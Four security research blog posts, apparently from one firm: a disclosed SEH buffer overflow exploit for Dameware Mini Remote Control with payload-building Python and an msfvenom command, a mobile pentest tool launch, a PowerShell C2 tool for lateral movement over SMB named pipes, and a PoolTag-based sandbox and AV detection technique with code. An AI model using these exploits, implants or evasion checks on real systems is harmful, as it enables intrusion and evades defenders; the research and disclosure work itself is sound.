CVE-2018-12897: Solarwinds Dameware Mini Remote Control Local SEH Buffer Overflow

Dameware Mini Remote Control (MRC) is a remote administration utility allowing remote access to end user devices for a variety of purposes. You can often find it among the plethora of toolkits used by system administrators managing the IT infrastructure in organisations.

Having recently completed my OSCE and looking to use some of the skills I picked up there in the real world, I found a local buffer overflow vulnerability in the latest version of Dameware MRC at the time of writing (12.0.5); it has been assigned CVE-2018-12897. The vulnerability is due to insecure handling of a user input buffer, which ultimately allows Structured Exception Handler (SEH) addresses to be overwritten and execution flow to be hijacked.

Below is a video demonstrating exploitation of this vulnerability as a proof of concept.

Solarwinds have been contacted about this issue; they acknowledged it and have released a version which reportedly contains a fix for the vulnerability, version 12.1. However, at the time of writing, this version doesn’t appear to be available from the customer portal, so if you are affected by this issue, it is recommended that you request it directly from customer support.

Method of Exploitation

One of the windows (AMT Settings) within the GUI has several input fields. The majority of these fields lack appropriate input sanitization, leading to crashes when a large amount of input (more than 3,000 characters) is entered. However, for the proof of concept, only one of these fields was used: the “Host” field under the SOCKS Proxy Settings.

As a simple test for this vulnerability, a large number of characters can be entered into the field to observe the results. Sometimes it may be necessary to fuzz input fields and parameters (an automated process of entering varying amounts of different characters in sequence in an attempt to identify unexpected behaviour), but this was not the case in this instance. Simply using a large number of A’s (over 2,000) or any other character would cause the application to terminate unexpectedly.
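Purely as an illustration (in practice the string was simply pasted into the field by hand), a suitably long marker string can be generated with a couple of lines of Python; the length and output filename are arbitrary:

# Write a long run of 'A' characters to a file so it can be pasted into
# the vulnerable "Host" field; anything comfortably above ~2,000
# characters is enough to trigger the crash described above.
with open("crash.txt", "w") as f:
    f.write("A" * 3000)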

Looking at this process in a debugger, it becomes clear what is happening. The input is written to the stack and has overflowed the SEH record. This is quickly visible by looking at the SEH chain in the debugger.

Following this process through, eventually we can see our A’s (0x41) being placed into EIP due to the corrupted SEH chain.

Interestingly though, the A’s aren’t displayed as they were entered; they have been separated by null bytes (0x00). This is because the input buffer is processed as wide characters, with UTF-16 encoding. From here, the next step is to determine how many bytes are required before the overwrite happens and to find a suitable set of “POP, POP, RET” instructions. The buffer length before the overflow was identified using Metasploit’s helpful “pattern_create” and “pattern_offset” utilities, taking care to observe the bytes surrounding the overwrite, as the null bytes have to be discounted. As DWRCC.EXE (the main executable) is not rebased on each execution, the instruction sequence found at address “0x00439D7D” was chosen. The executable was compiled without common protections, including ASLR, which, had it been present, would have made hardcoding an address in the exploit infeasible.
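Those utilities ship with Metasploit (tools/exploit/pattern_create.rb and pattern_offset.rb, or the msf-pattern_create and msf-pattern_offset wrappers on recent installs). Purely for illustration, the same cyclic pattern scheme can be reproduced in a few lines of Python; the lookup value at the bottom is a hypothetical four-character chunk read back from the debugger, not the real offset for this bug:

import itertools
import string

def pattern_create(length):
    # Same upper/lower/digit triplet scheme as Metasploit's
    # pattern_create, so offsets are directly comparable.
    out = ""
    for a, b, c in itertools.product(string.ascii_uppercase,
                                     string.ascii_lowercase,
                                     string.digits):
        out += a + b + c
        if len(out) >= length:
            break
    return out[:length]

def pattern_offset(value, length=5000):
    # 'value' is the chunk observed in the debugger; remember to discount
    # the interleaved 0x00 bytes introduced by the UTF-16 conversion.
    return pattern_create(length).find(value)

print(pattern_offset("Aq1A"))   # hypothetical value, for illustration only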

The next step is to overwrite the next SEH and SEH handler addresses with the address of the instructions found above and the opcodes for a short jump over that address. Once executed, the execution flow should then be directed into the area of memory on the stack under our control. For both the address and the jump, UTF-16 characters were used so as to avoid the null bytes. The payload looks like this at this point (most of the ‘A’s have been cropped for readability).
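As a rough sketch of the overall shape of such a payload (the padding length and the jump opcodes below are placeholders and assumptions; only the “POP, POP, RET” address comes from the analysis above, and how faithfully the pasted characters survive the application’s conversion is outside the scope of the sketch), it could be constructed along these lines:

import struct

def widechars(raw):
    # Interpret little-endian bytes as the UTF-16 text that, once the
    # application widens the input, should reproduce those bytes in memory.
    return raw.decode("utf-16-le")

padding = "A" * 776                                   # hypothetical offset to the SEH record
nseh    = widechars(b"\xeb\x06\x90\x90")              # short jump over the handler (assumed opcodes)
seh     = widechars(struct.pack("<I", 0x00439D7D))    # POP, POP, RET inside DWRCC.EXE (no rebase/ASLR)
payload = padding + nseh + seh
# ...alignment code and UTF-16 safe shellcode would be appended here...

with open("payload.txt", "w", encoding="utf-8") as f:
    f.write(payload)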

By placing a breakpoint on the first address of our “POP, POP, RET” instruction set, we can pause execution to step through and check everything is working as intended.

The breakpoint was hit, which is the first hurdle cleared; now we just need to make sure execution returns and takes the jump instruction.

Great, so the jump was taken and we are now executing in a controllable area of memory. This is good news! The next step is to increase the padding and place some shellcode. Due to the wide characters, the shellcode to be used will need to be UTF-16 compatible. Luckily, the alpha2 encoder in Metasploit has the ability to generate UTF-16 compatible shellcode. The one caveat is that it requires a register to hold the address of the beginning of the shellcode when the shellcode is executed. To achieve this, an offset would need to be calculated from an address which is unchanging on each run, independent of the operating system version.

After taking the offset into account, the calculated value could then be placed into EAX right before the shellcode executes. To do this, a technique known as “venetian shellcode” could be used to execute operations in between the null bytes and get EAX to hold the required address. For this to work, the null bytes must be consumed by other harmless operations. This concept was new to me, so I thought I would give it a go here to see how it works, using the simplest form of venetian shellcode. There are some fantastic write-ups which discuss this technique and its history, including Corelan’s tutorials and FuzzySecurity (you can find links to both at the bottom of this post). Thanks for all your awesome work, guys! After combining everything together, we now have the following:
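To give a flavour of the simplest form of venetian alignment (the register choice, constants and pad byte below are illustrative assumptions rather than the exact bytes used in this exploit), the attacker supplies narrow bytes and relies on the widening to produce the instruction stream shown in the comments:

# How the supplied narrow bytes decode once the application has widened
# them to UTF-16 (each byte gains a trailing 0x00):
#
#   54                push esp
#   00 6d 00          add  byte ptr [ebp], ch   ("venetian pad", harmless if [ebp] is writable)
#   58                pop  eax
#   00 6d 00          add  byte ptr [ebp], ch
#   05 00 20 00 11    add  eax, 0x11002000
#   00 6d 00          add  byte ptr [ebp], ch
#   2d 00 19 00 11    sub  eax, 0x11001900
#   00 6d 00          add  byte ptr [ebp], ch
#
# Net effect: EAX = ESP + 0x700.  The constants are placeholders; the real
# adjustment depends on where the shellcode sits relative to ESP at crash time.
venetian_align = b"\x54\x6d\x58\x6d" + b"\x05\x20\x11\x6d" + b"\x2d\x19\x11\x6d"

# The UTF-16 safe shellcode itself can be produced with Metasploit's
# unicode-aware (alpha2-based) encoder, e.g. (invocation indicative only):
#   msfvenom -p windows/exec CMD=calc.exe -e x86/unicode_mixed BufferRegister=EAX -f python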

I won’t go into too much detail about how it all works here but if you are interested, you should be able to get an evaluation copy of the software easily enough to have a go yourself! I’m sure there are many other ways to approach this (probably more elegant ways too!).

Finally, we can copy and paste in the constructed payload both inside and outside of the debugger to see what happens.

Several different mitigations for buffer overflows exist which can be implemented during compilation. In some situations they can be bypassed, but they still offer an added layer of protection which helps to prevent, or at least increase the complexity of, exploiting buffer overflows. These protections are not new and have been around for a good while now; it’s 2018, and yet many applications are still being compiled without them.

32 bit vs 64 bit

Due to the differences in the way that exceptions are handled between 32-bit and 64-bit applications, only the 32-bit version appears to be exploitable to run arbitrary code. The 64-bit version can be overflowed which will lead to a crash but there wouldn’t be any benefit in doing this from an attacking perspective.

Windows has some inbuilt protections which, when enabled, can help protect the end user from SEH based buffer overflow attacks. One of these, known as SEHOP (Structured Exception Handler Overwrite Protection), enforces an integrity check of the SEH chain before permitting execution. It does this by appending a symbolic record to the end of the SEH chain and, when an exception is raised, checking that this record is still present, thereby determining the integrity of the chain. If the integrity has been impaired, it will safely terminate the process. SEHOP can be enabled via Group Policy settings.
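For reference, the system-wide SEHOP setting is backed by a documented registry value (DisableExceptionChainValidation, where 0 means SEHOP is enabled), so its current state can be checked with a few lines of Python:

import winreg

# Per Microsoft's SEHOP guidance, DisableExceptionChainValidation = 0
# means SEHOP is enabled system-wide.
key_path = r"SYSTEM\CurrentControlSet\Control\Session Manager\kernel"
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, key_path) as key:
    try:
        value, _ = winreg.QueryValueEx(key, "DisableExceptionChainValidation")
        print("SEHOP enabled" if value == 0 else "SEHOP disabled")
    except FileNotFoundError:
        print("Value not present; the OS default applies")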

An older protection mechanism, known as SafeSEH, can be set via a compilation flag. This works by comparing a table of known safe exception handler addresses with those in the chain before jumping to them. However, this technique has some downsides, including the requirement to recompile binaries with the flag in order to benefit from its protection.

A personal note

Having recently passed my OSCE exam (which was an amazing experience and one I fully recommend), I was looking for something I could use my new-found skill set to practise on. Finding this vulnerability (while not the most exciting) was certainly rewarding and taught me some additional techniques that I may not have otherwise come across. Much of that teaching came from security professionals who have written some insanely useful and easy to follow tutorials, and I want to extend a big personal thank you to all who spend their time writing these tutorials and guides. Two of the guides I used for Venetian Shellcode can be found below, but the entire set of guides is invaluable for exploit development.

Disclosure Process

  • 15 June 2018 – Reported vulnerability to Solarwinds
  • 25 June 2018 – Update from Solarwinds that development team would be in further contact
  • 05 July 2018 – Contacted Solarwinds again to see if there had been any updates
  • 06 August 2018 – Requested update, vendor acknowledged the vulnerability and reported that remediation work was underway
  • 13 August 2018 – Vendor contacted Nettitude to confirm that version 12.1 had been released, containing a fix for the reported issue
  • 06 September 2018 – Public disclosure

Introducing Scrounger – iOS and Android mobile application penetration testing framework

Scrounger is a modular tool designed to perform the routine tasks required during a mobile application security assessment. Scrounger conveniently brings together both major mobile operating systems – Android and iOS – into a single tool, in a way that is easy to use, well documented, and easily extensible.

Where it differs

Scrounger consists of a number of modules built on top of a strong core. The rationale is to allow easy extensibility, just like Metasploit does. As a result, if you want Scrounger to perform additional checks, you can simply add a new module, which can then be executed either through Scrounger’s interactive console or its command line interface.

Furthermore, it contains both Android and iOS modules, so instead of using multiple tools to help you during a mobile application assessment, Scrounger offers you the possibility of using only one tool and learning only one set of commands that will work for both operating systems.

Scrounger already comes bundled with a number of modules that can be run to perform various checks against mobile applications.

Requirements

Scrounger has a few requirements, such as the installation of certain packages on the host and certain iOS binaries.

However, it already packs most of the iOS binaries and offers a module that installs them on the device. The package requirements are also specified on the Scrounger GitHub page.

If the prerequisites for a module are not satisfied, Scrounger will simply not run that module; all modules whose prerequisites are satisfied will run without any problems.

The other main requirement is to have jailbroken and rooted devices.

Usage

There are two main ways of using Scrounger: command line or interactive console.

The command line will be used mainly when performing all checks or building automation scripts. On the other hand, the console will be used to run only a certain number of modules or to perform specific actions such as decompiling, recompiling and signing applications, extracting certain files, etc.

Command line options

When using the command line, you can list the available modules and their arguments, list the available devices, run a full analysis (which runs all the modules for a certain type of application – Android or iOS) and run a specific module while passing the required arguments.

Here is an example of running a specific module, using the command line Scrounger, on an Android application.

First, we start by listing the required options for the module that we want to run and then we run it.

Console Examples

The console is the main attraction. It is packed with several powerful options and there is plenty of room for further improvements. The console already offers autocomplete (including file path autocomplete), module search, the ability to re-use results from other modules as arguments, command history between usages and the ability to reverse search the used commands.

Here is an example of the console listing specifically the available modules for iOS.

When listing modules, a brief description of what each module does is also displayed. For both iOS and Android there are two main types of module: misc and analysis. The misc modules are auxiliary modules that perform various actions against the applications, their files and/or devices. The analysis modules analyse either the application files, the application itself or the application-generated files in order to assess whether there are any security flaws.

First, we run the options command to show the required arguments for the specific module (as you would when using Metasploit). The options command also shows the global options; if a global option is set and a module has an argument with the same name, its value will be filled in automatically. Once the required arguments are set, we run options again to make sure that everything is set properly, and then launch the module using the run command.

As we can see, Scrounger will generate some output and results from running certain modules. These results can then later be used by other modules.

We can use the show results command to see all stored results returned by the execution of other modules. The print command can be used to show the value stored in a certain result, but also to print values stored in global or module arguments. If a result is needed by another module, it can be used by setting the relevant argument to the desired result, prefixed with the result: keyword. When setting these arguments, autocomplete will also look in the saved results table and suggest them. Once everything is set, we can simply run the module.

Device Examples

Several modules will require interaction with either an iOS or Android device. It is quite easy to add a device both in the command line or in console.

In this example, an Android device is added to the console using the add_device command (this also offers autocomplete: it will try to get the connected devices and show them as an option). Then, using the set global command, we set the device to be device 1. When using the misc/list_apps command, since the global option is already set and there is a module argument with the same name, it will automatically fill in the value for that argument.

Extensibility

Scrounger can also be easily extended to include custom modules and perform custom checks depending on the pentester’s preferences (and we welcome submissions to be included in future releases of Scrounger). When installing Scrounger, all the necessary directories will be created for you, including a custom modules directory under ~/.scrounger/modules/custom.
In the following example, a custom module was created under custom/analysis/ios/false_positive, meaning that this false_positive module is run against iOS applications.

Creating your own module

Creating a custom module is quite simple and requires only three things: a file under the correct module directory (depending on what your module is meant to do), two variables named meta and options, and a run function.

Here is an example.
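Purely as a hedged sketch of that structure (the base-class import path, the way option values are exposed and the result keys below are assumptions made for illustration; the meta/options/run layout itself is described above, and the documentation linked below is authoritative), a custom module might look roughly like this:

# ~/.scrounger/modules/custom/analysis/ios/false_positive.py
# Minimal sketch of a custom analysis module; names marked as assumed
# may differ from the real API.
from scrounger.core.module import BaseModule   # assumed import path


class Module(BaseModule):
    meta = {
        "author": "Your Name",
        "description": "Example check that always reports a finding",
        "certainty": 100,
    }

    options = [
        {
            "name": "identifier",
            "description": "the application's bundle identifier",
            "required": True,
            "default": None,
        },
    ]

    def run(self):
        # A real module would inspect the application here; this sketch
        # simply returns one canned finding (result structure assumed,
        # report=True marks it for inclusion in the final report).
        return {
            "false_positive_result": {
                "title": "Example finding",
                "details": "Checked identifier: {}".format(self.identifier),
                "report": True,
            }
        }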

 

The newly created file will be automatically added to the list of available modules the next time scrounger-console is launched. There are a few more elements to consider when it comes to creating the modules, especially analysis modules. For full details, Scrounger offers comprehensive documentation on all the available modules and a detailed explanation on how to create custom ones: https://github.com/nettitude/scrounger/docs

Real life case scenario

On a typical mobile application assessment, we would try to run as many modules as possible. To facilitate that, there is a module called full_analysis in the console, and an equivalent -f option in the command line, that runs all modules.

This option/module will decompile the application, run all the necessary auxiliary modules, and then run all the other available modules. It then creates a JSON file that contains the results and details of each module that returned report=True. The command line executable also has an option (-p) that will read a JSON file and print all the results and details to the console.

Future work, feedback & special thanks

There is a lot in store for Scrounger’s future.

The next features to be implemented are included in the last section of the README in Scrounger’s GitHub: https://github.com/nettitude/scrounger.

Any feedback, ideas or bugs can be submitted over on GitHub.

Additionally, a special thanks to all the existing tools and their developers, as they have contributed to bringing Scrounger to life. Just to mention a few:

Download

GitHub: https://github.com/nettitude/scrounger

Extending C2 Lateral Movement – Invoke-Pbind

Invoke-Pbind is a mini post exploitation framework written in PowerShell, which builds C2 communications over SMB named pipes using a push rather than a pull mechanism. Pbind was initially created to overcome lateral movement problems, specifically in restricted environments where the server VLAN could not directly talk to the user VLAN (as it should be in every environment). The tool was designed to be integrated with any C2 framework or run as a standalone PowerShell script.

Video Demonstration

If you just want to skip to the video tutorial, then you can find that here and at the end of this post.

The Problem: Segregation and Strict Firewalling

This is useful when you have compromised an organisation and have C2 comms over HTTPS, traversing the corporate proxy server out of the network from users’ workstations, but the target dataset that you are looking to obtain is located in a server VLAN, with a firewall restricting both inbound and outbound traffic. In that scenario, firewall rules are always going to allow specific traffic to traverse over pre-approved services. The following diagram illustrates one such situation, where the environment allows limited services from the user VLAN to the server VLAN, but allows no ports in the reverse direction.

What options exist for C2 comms

The following are some options for C2 comms and the mitigations that cause each of them to fail.

Method | Mitigation | Result
Direct Internet Access | Blocked by firewall outbound | Fail
Traverse through HTTP proxy | Blocked by firewall outbound | Fail
TCP reverse shell | Blocked, or likely detected while scanning for open ports | Fail
TCP bind shell | Blocked by firewall inbound, or a service already running on the open ports and no closed ports detected | Fail
ICMP | Blocked by firewall outbound | Fail
Daisy over SMB in user VLAN | TCP port 445 blocked from servers to workstations | Fail
Daisy over HTTP in user VLAN | Same as a standard reverse shell – all ports blocked | Fail
DNS | Authoritative DNS is only permitted via the proxy server, so not possible for C2 comms from the server VLAN | Fail

To be clear, at this point the problem isn’t about getting execution; it’s about having reliable C2 comms that give the operator output for every command executed, and about using the implant as a foothold or staging point for further attacks against servers in the restricted environment.

The Solution

“A named pipe is a logical connection, similar to a Transmission Control Protocol (TCP) session, between the client and server that are involved in the CIFS/SMB connection. The name of the pipe serves as the endpoint for the communication, in the same manner as a port number serves as the endpoint for TCP sessions. This is called a named pipe endpoint.” – https://msdn.microsoft.com/en-us/library/cc239733.aspx.

.NET provides classes for creating and interacting with named pipes, such as System.IO.Pipes.NamedPipeServerStream and NamedPipeClientStream.

Where TCP port 445 is open into a server environment, we can overlay the SMB protocol and use a named pipe to share data between the workstation and the server, providing a method for exchanging comms. The basis of the technique is to create a named pipe with an access rule that allows “everyone” access.

Since the days of abusing IPC$ with anonymous access (CVE-1999-0519), and RID cycling your way to a plethora of goodies, Microsoft have said “no – thou shall not pass” (not a direct Microsoft quote). One quick problem to overcome: while the ‘AccessRule’ applied to the pipe may look like it allows “everyone” access to the named pipe, this is not actually the case. However, in a domain environment, any user can create a domain-authenticated session to the IPC$ share, which can then be piggybacked to gain access to the named pipe; a simple PowerShell script can be used to create such an authenticated session.

Interacting with a named pipe is also fairly straightforward as long as you know the data type of what is being read; as we create the server, we know how to handle the pipe, for example by reading from it with a simple StreamReader.
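Purely to illustrate the same create-then-read flow in a compact, standalone form (the tool itself does this with the .NET classes from PowerShell), here is a rough sketch using Python’s pywin32 bindings; the pipe name is a placeholder and a permissive NULL DACL stands in for the “everyone” access rule:

import win32file
import win32pipe
import win32security

PIPE_NAME = r"\\.\pipe\demo_pbind"   # placeholder name

# A NULL DACL makes the pipe world-accessible, standing in for the
# "everyone" access rule described above.
sa = win32security.SECURITY_ATTRIBUTES()
sa.SECURITY_DESCRIPTOR.SetSecurityDescriptorDacl(1, None, 0)

pipe = win32pipe.CreateNamedPipe(
    PIPE_NAME,
    win32pipe.PIPE_ACCESS_DUPLEX,
    win32pipe.PIPE_TYPE_MESSAGE | win32pipe.PIPE_READMODE_MESSAGE | win32pipe.PIPE_WAIT,
    1,        # max instances
    65536,    # out buffer size
    65536,    # in buffer size
    0,        # default timeout
    sa,
)

# Block until a client connects (e.g. over SMB as \\server\pipe\demo_pbind),
# then read one message - the equivalent of the StreamReader step above.
win32pipe.ConnectNamedPipe(pipe, None)
_, data = win32file.ReadFile(pipe, 65536)
print(data.decode("utf-8", errors="replace"))
win32file.CloseHandle(pipe)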

Design

When we came up with Invoke-Pbind, the following design principles were applied.

Client/Server Model

To allow for inclusion in a C2 framework, two script blocks were created: client and server. The server starts and sets up the named pipe on a remote target (the server). The client then connects to the named pipe and exchanges messages over TCP port 445 (SMB). The client runs through an existing C2 implant and, by using script blocks and runspaces, it is possible to use the client non-interactively for better integration with most C2 frameworks.

Token Passing

When sharing a common space such as a named pipe, it is imperative that messages exchanged between the client and server are not overwritten before being picked up by their counterpart. Control messages are used in combination with TRY and IF statements to create rules for when a client or server should read from or write to the named pipe.

Security

During the generation of the script blocks, at run time, a unique key is generated and used to encrypt messages between client and server. Pbind supports AES 256 encryption. To initiate a connection to the named pipe from a client, a shared secret is also supported to stop tampering with the named pipe. If the client does not provide the correct secret, the named pipe will close.

Injection/Execution

There are two main methods included that inject the implant into target hosts. These are modified versions of Invoke-WMIExec and Invoke-SMBExec (credit to Kevin Robertson for these scripts); both have been updated to support passing passwords, where previously they only accepted hashes for authentication. The implant is a self-executing script block that is passed as the payload. The script runs WMIExec by default, but contains a switch parameter to invoke SMBExec instead.

To provide additional deployment flexibility, the script also includes an EXE method. This method uses CSC (the C# compiler) and the Windows .NET automation DLL to compile the implant into an executable that can then be deployed and executed through any means.

NOTE: Creating a named pipe does not require administrator credentials so the executable can be run as a non-privileged user. On the other hand, WMIExec and SMBExec require administrator privileges.

The EXE option still generates unique variables that are hardcoded into the executable, for use in cryptography and the like. It can be used offline to create an executable implant and is not tied to an interactive session through a C2. To talk to the implant, the script supports a CLIENT option that is used to interact with a deployed implant; the options for doing so are provided when the implant is compiled.

This flexibility allows for deployment through any means:

  • DCOM
  • RDP
  • Shared Folders
  • WinRM
  • SCCM
  • Anything……

There are a number of options that are configurable. If no options are selected, the script reverts to pre-set or randomly generated values. The following options are configurable:

  • KEY – Defaults to a randomly generated AES 256 key – Allows for a key to be specified, commonly used in client mode.
  • SECRET – Defaults to a random 5 character value – Allows for a specific secret to be used.
  • PNAME – Defaults to a random 8 character value – Allows for a specific pipe name to be chosen.
  • TIMEOUT – Defaults to 60 seconds – Changes the wait time for the client to connect to the implant, useful on slow networks.
  • EXE – Generates a stand-alone executable.
  • CLIENT – Runs the script in client mode to connect to a deployed executable.
  • TARGET – Used to specify a remote IP address.
  • Domain/User/Password/Hash – Used to provide credentials for authentication.
  • Domain2/User2/Password2 – Used to map a drive to the target system when a hash is being used as the primary authentication mechanism.
  • Dir – Used in EXE mode to specify where to output the generated executable.
  • Automation – Used in EXE mode to specify the directory location of the Automation DLL.

Interaction

There are three main functions that have been created to interact with the implant from a client. The first, and probably the most useful, especially when we introduce templates, is Pbind-Command. This simply registers a command in a variable that is read by the client and passed to the implant (server) before being executed. A simple example is shown below:

The second is Pbind-Module, which allows you to read in any other ps1 file and have it injected into memory on the implanted host, for example:

Pbind-module c:\folder\powerup.ps1

Pbind-Command can then be used to execute any of the functions in the ps1 script. This has a limitation and does not work well within a C2 setup, because all scripts have to be local to the client. In most cases the client is already running on a target workstation and would require all scripts to be uploaded to the client before being sent on to the implant.

Pbind-Squirt was designed to help resolve the limitations of Pbind-Module. The idea for this function was to embed a number of scripts as base64 objects into the script, which can then be called and auto-executed in memory on the client. The only one that has been embedded is PowerUp, to assist with asset review on newly implanted hosts.

However, in practice neither Pbind-Module nor Pbind-Squirt was optimal, and instead a new solution was constructed, called ‘Templates’. Effectively this is just a better way to interact with the Pbind-Command function. By creating a number of small scripts which automate tasks, it is possible to achieve the same goals as Pbind-Module and Pbind-Squirt. Tasks such as uploading Mimikatz and extracting passwords, uploading PowerView and running queries, or uploading Invoke-SMBExec and attacking other machines can all be scripted using a similar template to the one below:

The best way to see how the script runs is to download the script and have a go. The screenshot below shows a simple example of running the script locally under the context of another user, while also executing commands.

Video Tutorial

We have created a video tutorial to help illustrate the use of Invoke-Pbind.

Download

GitHub: https://github.com/nettitude/PoshC2/blob/master/Modules/Invoke-Pbind.ps1

Using PoolTags to Fingerprint Hosts

Commonly, malware will fingerprint the host it executes on, in an attempt to discover more about its environment and act accordingly.

Part of this process is quite often dedicated to analyzing specific data in order to figure out if the malware is running inside a VM, which could just be a honeypot or an analysis environment, and also for detecting the presence of other software.  For example, malware will quite often try to find out if a system monitoring tool is running (procmon, sysmon, etc.) and which AV software is installed.

In this article, we will introduce another method of fingerprinting a host that could be potentially abused by malware.

Common ways of host fingerprinting

In this section we provide a short list of well-known ways of detecting a VM environment, and the presence of other security software, that are often applied by malware. Note that the following list is not exhaustive.

  • Process Enumeration
  • Loaded modules Enumeration
  • File Enumeration
  • Data Extracted from Windows Registry (Hard disk, BIOS etc…)
  • Loaded drivers enumeration
  • Open a handle to specific named device object
  • System Resources Enumeration (CPU cores, RAM, Screen Resolution, etc…)

The PoolTag way

If you have some experience with Windows kernel driver development and analysis, you should be familiar with the ExAllocatePoolWithTag [1] function, which is used to allocate memory chunks at kernel level. The key part here is the ‘Tag’ parameter, which provides some sort of identification for a specific allocation.

If something goes wrong, for example because of a memory corruption issue, we can use the specified tag (up to four characters) to associate a buffer with the code path in the kernel driver that allocated that memory chunk. This makes the method well suited to detecting the presence of kernel drivers, and thus of software that loads modules into the kernel, which could potentially circumvent the fingerprinting methods mentioned above, since those rely on information that a driver could alter. In other words, it is ideal for detecting the stuff that really matters from the malware author’s point of view.

For example, security/monitoring software might try to hide its processes and files by registering callback filters at kernel level.  An analyst might try to harden their VM environment by removing artefacts from the registry and other things that malware is usually searching for.

However, what a security software vendor and/or analyst probably won’t do, is modify specific kernel drivers used by their own program and/or system/VM environment to constantly alter the Tags of their kernel pool allocations.

Getting PoolTag Information

This information can be obtained by calling the NtQuerySystemInformation [2] function and selecting SystemPoolTagInformation (0x16) [3] for the SystemInformationClass parameter.

The aforementioned function and the possible SystemInformationClass values are only partially documented on MSDN, but fortunately, with some online research, we can find documentation produced by researchers. In particular, Alex Ionescu has documented a lot of otherwise undocumented Windows internals in his NDK [3] project.

For this proof of concept, we wrote our own code for getting and parsing PoolTag information, but if you want to go the GUI way to experiment with the results, then PoolMonEx [4] is a really nice tool to play with.
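If you would rather experiment from a script before diving into the C++ version, a rough Python ctypes sketch of the same NtQuerySystemInformation call is shown here; the structure layouts follow commonly published definitions of the undocumented API, so field names, sizes and required privileges are assumptions that may need adjusting (and the Python build should match the OS bitness):

import ctypes
from ctypes import wintypes

SystemPoolTagInformation = 0x16
STATUS_INFO_LENGTH_MISMATCH = 0xC0000004


class SYSTEM_POOLTAG(ctypes.Structure):
    # Layout as commonly published for this undocumented API; ctypes applies
    # the same default alignment as MSVC.
    _fields_ = [
        ("Tag",            ctypes.c_char * 4),
        ("PagedAllocs",    wintypes.ULONG),
        ("PagedFrees",     wintypes.ULONG),
        ("PagedUsed",      ctypes.c_size_t),
        ("NonPagedAllocs", wintypes.ULONG),
        ("NonPagedFrees",  wintypes.ULONG),
        ("NonPagedUsed",   ctypes.c_size_t),
    ]


ntdll = ctypes.WinDLL("ntdll")
ntdll.NtQuerySystemInformation.restype = ctypes.c_ulong


def query_pool_tags():
    size = 0x10000
    while True:
        buf = ctypes.create_string_buffer(size)
        ret_len = wintypes.ULONG(0)
        status = ntdll.NtQuerySystemInformation(
            SystemPoolTagInformation, buf, size, ctypes.byref(ret_len))
        if status == STATUS_INFO_LENGTH_MISMATCH:
            size *= 2          # buffer too small, grow and retry
            continue
        if status != 0:
            raise OSError("NtQuerySystemInformation failed: 0x%08X" % status)
        break

    count = ctypes.cast(buf, ctypes.POINTER(wintypes.ULONG)).contents.value

    class SYSTEM_POOLTAG_INFORMATION(ctypes.Structure):
        _fields_ = [("Count", wintypes.ULONG),
                    ("TagInfo", SYSTEM_POOLTAG * count)]

    info = ctypes.cast(buf, ctypes.POINTER(SYSTEM_POOLTAG_INFORMATION)).contents
    return {entry.Tag.decode("latin-1"): (entry.NonPagedUsed, entry.PagedUsed)
            for entry in info.TagInfo}


if __name__ == "__main__":
    for tag, (nonpaged, paged) in sorted(query_pool_tags().items()):
        if nonpaged or paged:
            print("%-4s nonpaged=%-12d paged=%d" % (tag, nonpaged, paged))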

For instance, the following is a screenshot of our tool’s output.  Source code below.

This can be compared with the Nbtk-tagged allocation results from PoolMonEx, shown below.

QueryPoolTagInfo.cpp

Defs.h

Targeting PoolTag Information

In order to make sense of the acquired PoolTag information, it is necessary to analyse the drivers that we are interested in. By searching for calls to ExAllocatePoolWithTag, we can log specific tags used by those drivers and keep them in our list.

At this point, you should be aware that any driver can use any tag at will, and for that reason it makes sense to try to find some tags that appear to be less common and not otherwise used by standard Windows kernel drivers and/or objects.

With that being said, this method of detecting specific drivers might produce false positives if not used with extra care.

A PoolTag Example List

For the sake of demonstrating a proof of concept, we have collected some PoolTag information from specific drivers; a short example of checking for these tags follows the list below.

  • VMWare (Guest OS)
    • vm3dmp.sys (Tag: VM3D)
    • vmci.sys (Tags: CTGC, CTMM, QPMM, etc…)
    • vmhgfs.sys (Tags: HGCC, HGAC, HGVS, HGCD etc…)
    • vmmemctl.sys (Tag: VMBL)
    • vsock.sys (Tags: vskg, vskd, vsks, etc…)
  • Process Explorer
    • procexp152.sys (Tags: PEOT, PrcX, etc…)
  • Process Monitor
    • procmon23.sys (Tag: Pmn)
  • Sysmon
    • sysmondrv.sys (Tags: Sys1, Sys2, Sys3, SysA, SysD, SysE, etc…)
  • Avast Internet Security
    • aswsnx.sys (Tags: ‘Snx ‘, Aw++) (We used single quotes in the first because it ends with a space character)
    • aswsp.sys (Tags: pSsA, AsDr)
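Tying this back to the earlier sketch, the tags above could be checked against the live pool tag table along these lines (re-using the query_pool_tags() helper from the previous snippet; the tag selection and matching here are deliberately simplistic):

# Tags taken from the list above.  A single matching tag is weak evidence
# on its own, so real checks should require several tags per product.
INTERESTING_TAGS = {
    "VMware guest":     ["VM3D", "CTGC", "CTMM", "QPMM", "HGCC", "VMBL", "vskg"],
    "Process Explorer": ["PEOT", "PrcX"],
    "Process Monitor":  ["Pmn"],
    "Sysmon":           ["Sys1", "Sys2", "Sys3"],
    "Avast":            ["Snx", "Aw++", "pSsA", "AsDr"],
}

# Normalise padding, since tags shorter than four characters may be padded
# with spaces or NULs in the pool tag table.
present = {tag.strip("\x00 ") for tag in query_pool_tags()}

for product, tags in INTERESTING_TAGS.items():
    hits = [t for t in tags if t in present]
    if hits:
        print("%s appears to be present (tags: %s)" % (product, ", ".join(hits)))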

Conclusion

Just like every other method, this one has its strengths and weaknesses.

This method cannot be easily circumvented, especially on 64-bit Windows, where Kernel Patch Protection (PatchGuard) does not allow kernel functions to be modified, among other things; directly hooking functions such as NtQuerySystemInformation is therefore no longer an option for security and monitoring tools.

Also, this method is not affected by drivers that attempt to hide/block access to specific processes, files, and registry keys, from userland processes.

In addition, this method could be potentially used to fingerprint the host further.

By searching for specific tags of Windows objects that were introduced in a particular release of the OS, we can determine its major version.

For example, by comparing the PoolTag information (pooltag.txt) that comes with different versions of WinDbg, in this case Windows 8.1 x64 and Windows 10 x64 (Build 10.0.15063), we were able to find PoolTags such as Nrsd, Nrtr and Nrtw that are used by the netio.sys kernel driver in Windows 10, but not in Windows 8.1.

We later did a quick verification by using two VMs, and we could indeed find pool allocations with at least two of the aforementioned tags in Windows 10, while there were none of those in our Windows 8.1 VM.

That being said, it is a common and good practice for kernel driver development to use tags that make some sense based on the module that allocates them and their purpose.

On the other hand, as mentioned already, PoolTags can be used at will and for that reason we have to be careful about which ones we are targeting.

One last thing to mention is that PoolTag information changes all the time; in other words, chunks of memory are constantly allocated and de-allocated, so this should be kept in mind when choosing which PoolTag to search for.

Even though this method might look more experimental than practical, in reality when malware is searching for specific monitoring and security software, PoolTag information can be very reliable.

References

